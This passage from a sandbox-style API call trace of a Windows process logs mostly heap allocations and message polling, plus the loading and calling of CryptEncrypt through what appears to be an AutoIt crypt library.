(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.636] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0222.636] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.636] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.636] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.636] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0222.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.637] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0222.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.637] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.637] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0222.637] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.637] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0222.637] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0222.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.638] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.638] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0222.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0222.638] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.638] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0222.639] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.639] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0222.639] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0222.639] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.640] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51580, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.640] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.640] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e7f490 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.641] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552e8 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552e8 | out: hHeap=0x970000) returned 1 [0222.641] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0222.643] CryptEncrypt (in: hKey=0xa87710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x8343, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8348) returned 1 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55218 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55138 [0222.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0222.643] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0222.643] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e552a8 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e552a8 | out: hHeap=0x970000) returned 1 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55228 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55228 | out: hHeap=0x970000) returned 1 [0222.644] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0222.644] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55298 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55298 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55238 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55238 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55248 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55248 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55258 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55258 | out: hHeap=0x970000) returned 1 [0222.645] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0e78 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0222.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0222.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0222.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0222.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0222.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f468 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0222.649] CharLowerBuffW (in: lpsz="byte[33608]", cchLength=0xb | out: lpsz="byte[33608]") returned 0xb [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0222.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8348) returned 0x2f3d210 [0222.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: 